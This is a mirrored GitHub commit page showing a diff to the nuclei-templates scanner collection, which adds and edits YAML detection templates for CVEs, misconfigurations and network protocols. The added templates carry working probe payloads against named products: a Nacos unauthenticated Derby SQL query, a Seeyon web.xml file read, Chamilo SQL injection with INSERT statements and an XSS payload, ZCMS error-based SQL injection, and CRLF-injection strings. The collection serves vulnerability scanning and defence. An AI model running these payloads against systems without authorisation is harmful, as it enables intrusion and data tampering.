daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #46 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-05-01 07:45:51 +05:30 committed by GitHub
parent 06c5cd45fa 6cb2871f82
commit 5cf0900c6c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
20 changed files with 254 additions and 62 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 297 | vulnerabilities | 139 | exposed-panels | 122 |
| takeovers | 67 | exposures | 88 | technologies | 64 |
| cves | 297 | vulnerabilities | 142 | exposed-panels | 122 |
| takeovers | 67 | exposures | 89 | technologies | 64 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 |
**102 directories, 1021 files**.
**102 directories, 1031 files**.
</td>
</tr>

36
cves/2020/CVE-2020-36287.yaml
View File

@ -1,36 +0,0 @@
id: CVE-2020-36287
info:
name: Jira Dashboard Gadgets / Information Disclosure
author: Jafar_Abo_Nada
severity: medium
description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check.
tags: cve,cve2020,jira,atlassian,disclosure
reference: |
- https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116
- https://nvd.nist.gov/vuln/detail/CVE-2020-36287
# On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs
requests:
- raw:
- |
GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- |
GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "contains(body_1, '<userPrefsRepresentation>')"
- "status_code_2 != 401"
condition: and

30
cves/2021/CVE-2021-29442.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-29442
info:
name: Nacos prior to 1.4.1 Missing Authentication Check
description: |
In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out.
While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users.
These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)
author: dwisiswant0
severity: high
reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
tags: nacos,auth-bypass,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: regex
regex:
- "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""
part: body

24
exposures/backups/exposed-mysql-initial.yaml Normal file
View File

@ -0,0 +1,24 @@
id: exposed-mysql-initial
info:
name: Exposed mysql.initial
author: ELSFA7110
severity: info
reference: https://hackerone.com/reports/1081817
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/mysql.initial.sql"
matchers-condition: and
matchers:
- type: word
words:
- "Roundcube Webmail initial database structure"
part: body
- type: status
status:
- 200

6
misconfiguration/sonarqube-public-projects.yaml
View File

@ -21,8 +21,8 @@ requests:
- type: word
words:
- 'results'
- 'items'
- 'more'
- '"results":'
- '"items":'
- '"more":'
part: body
condition: and

6
misconfiguration/springboot/springboot-env.yaml
View File

@ -16,11 +16,9 @@ requests:
- type: word
part: body
words:
- "JAVA_HOME"
- "sping.config.location"
- "spring.application.name"
- "applicationConfig"
- "local.server.port"
condition: or
condition: and
- type: status
status:
- 200

34
misconfiguration/springboot/springboot-httptrace.yaml Normal file
View File

@ -0,0 +1,34 @@
id: springboot-httptrace
info:
name: Detect Springboot httptrace
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: View recent HTTP requests and responses
requests:
- method: GET
path:
- "{{BaseURL}}/actuator/httptrace"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"traces"'
- '"timestamp"'
- '"principal"'
- '"session"'
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header

4
misconfiguration/springboot/springboot-loggers.yaml
View File

@ -17,8 +17,8 @@ requests:
part: body
words:
- '"loggers"'
- '"profiles":'
condition: or
- '"levels"'
condition: and
- type: status
status:

15
misconfiguration/springboot/springboot-trace.yaml
View File

@ -10,22 +10,21 @@ requests:
- method: GET
path:
- "{{BaseURL}}/trace"
- "{{BaseURL}}/actuator/trace"
- "{{BaseURL}}/httptrace"
- "{{BaseURL}}/actuator/httptrace"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "traces"
- "response"
- "request"
- "principal"
condition: or
- '"timestamp"'
- '"info"'
- '"method"'
- '"path"'
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"

21
network/java-rmi-detect.yaml Normal file
View File

@ -0,0 +1,21 @@
id: java-rmi-detect
info:
name: Detect Java RMI Protocol
author: F1tz
severity: info
tags: network,rmi
network:
- inputs:
- data: "{{hex_decode('4a524d4900024b')}}"
host:
- "{{Hostname}}"
read-size: 1024
matchers:
- type: regex
part: raw
regex:
- "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00"

24
network/weblogic-iiop-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: weblogic-iiop-detect
info:
name: Detect Weblogic IIOP Protocol
author: F1tz
severity: info
description: Check IIOP protocol status.
tags: network,weblogic
network:
- inputs:
- data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}"
host:
- "{{Hostname}}"
read-size: 1024
matchers-condition: and
matchers:
- type: word
words:
- "GIOP"
- "weblogic"
condition: and

20
network/weblogic-t3-detect.yaml Normal file
View File

@ -0,0 +1,20 @@
id: weblogic-t3-detect
info:
name: Detect Weblogic T3 Protocol
author: F1tz
severity: info
description: Check T3 protocol status.
tags: network,weblogic
network:
- inputs:
- data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
host:
- "{{Hostname}}"
read-size: 1024
matchers:
- type: word
words:
- "HELO"

4
takeovers/fastly-takeover.yaml
View File

@ -3,9 +3,9 @@ id: fastly-takeover
info:
name: fastly takeover detection
author: pdcommunity
severity: high
severity: info
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22
requests:
- method: GET

1
vulnerabilities/generic/crlf-injection.yaml
View File

@ -18,6 +18,7 @@ requests:
- "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975
- "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
matchers:
- type: regex

2
vulnerabilities/generic/open-redirect.yaml
View File

@ -45,5 +45,5 @@ requests:
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

25
vulnerabilities/other/WooYun-2015-148227.yaml Normal file
View File

@ -0,0 +1,25 @@
id: WooYun-2015-148227
info:
name: Seeyon WooYun LFR
author: princechaddha
severity: high
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
tags: seeyon,wooyun,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<servlet-name>NCInvokerServlet</servlet-name>"
part: body
- type: word
part: header
words:
- "application/xml"

29
vulnerabilities/other/chamilo-lms-sqli.yaml Normal file
View File

@ -0,0 +1,29 @@
id: chamilo-lms-sqli
info:
author: undefl0w
name: Chamilo LMS SQL Injection
severity: high
description: Finds sql injection in Chamilo version 1.11.14
tags: chamilo,sqli
requests:
- raw:
- |
POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
type=image&field_id=image&tag=image&from=image&search=image&options=["test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'{{randstr}}'); INSERT INTO extra_field_options(option_value) VALUES ('{{randstr}}'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '{{randstr}}', 16,0) ON DUPLICATE KEY UPDATE tag='{{randstr}}', field_id=16, count=0; -- "]
- |
POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
type=image&field_id=image&tag=image&from=image&search=image&options=["test') or 1=1 -- "]
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "{{randstr}}")'

5
vulnerabilities/other/chamilo-lms-xss.yaml
View File

@ -10,15 +10,14 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
- '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
- '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover%3dxss(0x01CE61)"
- 'agenda_js.php?type=xss" onmouseover=alert(document.domain)'
- type: status
status:
- 200

21
vulnerabilities/other/zcms-v3-sqli.yaml Normal file
View File

@ -0,0 +1,21 @@
id: zcms-v3-sqli
info:
name: ZCMS SQL Injection
author: princechaddha
severity: high
reference: https://www.anquanke.com/post/id/183241
tags: zcms,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
part: body

3
vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
View File

@ -63,7 +63,10 @@ requests:
- type: word
words:
- 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)'
- "PHP Version"
- "Configuration Command"
part: body
condition: and
- type: word
words:
- 'text/html'